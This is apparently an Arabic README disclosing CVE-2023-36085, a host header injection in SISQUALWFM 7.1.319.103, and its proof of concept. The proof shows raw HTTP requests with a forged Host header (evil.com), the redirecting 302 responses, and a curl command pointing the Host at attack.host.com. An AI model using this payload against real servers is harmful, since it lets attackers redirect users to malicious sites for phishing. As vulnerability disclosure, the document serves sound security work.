
يحتوي هذا المستودع على معلومات متعلقة بـ CVE-2023-36085، وهي ثغرة حقن في ترويسة المضيف (host header injection) تم اكتشافها في SISQUALWFM الإصدار 7.1.319.103، والتي تسمح للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع ضار. تم تخصيص هذا الثغرة CVE-2023-36085 وقد تم إصلاحها في الإصدار 7.1.319.111 وما فوق.
هذا المستودع يحتوي على معلومات متعلقة بثغرة حقن ترويسة المضيف المكتشفة في إصدار SISQUALWFM 7.1.319.103، والتي تسمح للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع ضار. تم تخصيص CVE-2023-36085 لهذه الثغرة وتم إصلاحها في الإصدار 7.1.319.111 وما فوق.
نقدم سيناريو إثبات مفهوم يوضح ثغرة حقن ترويسة المضيف، مستهدفًا على وجه التحديد نقطة النهاية /sisqualIdentityServer/core. تسمح هذه الثغرة للمهاجم بالتلاعب بروابط صفحات الويب أو إعادة توجيه المستخدمين إلى موقع آخر عن طريق العبث بترويسة المضيف.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

لاستغلال هذه الثغرة، يمكن للمهاجم استخدام أمر curl التالي لتعديل ترويسة المضيف:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
هذا المستودع لأغراض إعلامية فقط ولا ينبغي استخدامه لأي أنشطة ضارة. تم الإبلاغ عن الثغرة بشكل مسؤول إلى البائع، وتم حل المشكلة. من الضروري اتباع إرشادات القرصنة الأخلاقية واحترام ممارسات الإفصاح المسؤول عند اكتشاف الثغرات والإبلاغ عنها.